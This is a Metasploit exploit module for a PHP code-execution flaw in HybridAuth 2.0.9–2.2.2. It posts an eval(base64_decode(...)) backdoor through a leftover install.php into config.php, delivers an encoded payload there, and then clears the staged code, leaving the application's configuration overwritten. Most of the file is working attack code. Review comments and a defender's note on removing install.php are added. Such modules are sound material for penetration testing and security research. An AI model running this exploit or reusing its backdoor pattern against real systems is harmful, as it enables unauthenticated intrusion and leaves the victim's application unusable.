##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Manual rank because a successful run is destructive: the target's
  # config.php is overwritten (see 'Description' below) and is not restored.
  Rank = ManualRanking # application config.php is overwritten

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. The only option registered here is
  # TARGETURI, the base path under which install.php and config.php live.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HybridAuth install.php PHP Code Execution',
        'Description' => %q{
          This module exploits a PHP code execution vulnerability in
          HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
          is not removed after installation allowing unauthenticated users to
          write PHP code to the application configuration file 'config.php'.

          Note: This exploit will overwrite the application configuration file
          rendering the application unusable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pichaya Morimoto', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['EDB', '34273'],
          ['OSVDB', '109838']
        ],
        'Arch' => ARCH_PHP,
        'Platform' => 'php',
        'Targets' => [
          # Tested:
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2014-08-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
      ]
    )
  end

  #
  # Check:
  # * install.php exists
  # * config.php is writable
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
  #
  # Returns Exploit::CheckCode::Unknown when no response is received,
  # Exploit::CheckCode::Vulnerable when all three conditions above hold,
  # and Exploit::CheckCode::Safe otherwise (404, non-writable config,
  # or a version outside the affected range). Only a single GET to
  # install.php is made; nothing is written.
  #
  # Defender's note: the presence of a reachable install.php after setup
  # is the root cause — removing it (as the Description states is not done
  # automatically) closes the issue, and requests for install.php are the
  # natural thing to alert on.
  #
  def check
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
    if !res
      vprint_error "Connection failed"
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error "Could not find install.php"
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
      # The installer page names the file it cannot write; $1 is that name.
      # NOTE(review): Regexp.last_match(1) is the clearer form of $1.
      vprint_error "#{$1} is not writable"
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
      # Version string as printed in the installer page title.
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
      vprint_status "Found version: #{version}"
      # NOTE(review): no end anchor after the last alternative, so a
      # hypothetical later release such as 2.2.20 would also match here;
      # tightening the pattern would avoid that false positive.
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
        return Exploit::CheckCode::Vulnerable
      else
        vprint_error "HybridAuth version #{version} is not vulnerable"
      end
    end
    Exploit::CheckCode::Safe
  end

  #
  # Exploit
  #
  # Three HTTP round trips against TARGETURI:
  #   1. POST to install.php, which causes the installer to write the
  #      OPENID_ADAPTER_STATUS value into config.php (overwriting it).
  #   2. POST to config.php, which now contains the staged code, delivering
  #      the encoded payload under a randomly numbered parameter name.
  #   3. POST to install.php again with an empty OPENID_ADAPTER_STATUS to
  #      clear the staged code; config.php itself stays overwritten.
  # Every step fails closed via fail_with except the response handling in
  # step 2 (see the note there).
  #
  def exploit
    # check vuln
    # Re-runs check so a manual run against an unaffected target stops
    # before anything is written.
    if check != Exploit::CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    # write backdoor
    print_status "Writing backdoor to config.php"
    # Random integer in 0...1000, reused below as the POST parameter name
    # the staged code reads from.
    payload_param = rand(1000)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'install.php'),
      'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
    )
    if !res
      fail_with Failure::Unknown, "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      # Success is inferred only from the installer's completion text.
      print_good "Wrote backdoor successfully"
    else
      # NOTE(review): message typo — "Coud" should read "Could".
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
    end

    # execute payload
    code = Rex::Text.encode_base64(payload.encoded)
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"
    # Second argument is the request timeout in seconds; it is short because
    # a session-spawning payload may not return an HTTP response promptly.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'config.php'),
      'data' => "#{payload_param}=#{code}"
    }, 5)
    if !res
      print_warning "No response"
    elsif res.code == 404
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
    elsif res.code == 200 || res.code == 500
      print_good "Sent payload successfully"
    end
    # NOTE(review): any other status code (e.g. 403) falls through silently
    # and the module proceeds to cleanup without reporting it; an else
    # branch with a print_warning would make that visible.

    # remove backdoor
    # Clears the staged value from config.php; it does not restore the
    # original configuration (see the Description note).
    print_status "Removing backdoor from config.php"
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'install.php'),
      'data' => 'OPENID_ADAPTER_STATUS='
    )
    if !res
      print_error "Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "Removed backdoor successfully"
    else
      print_warning "Could not remove payload from config.php"
    end
  end
end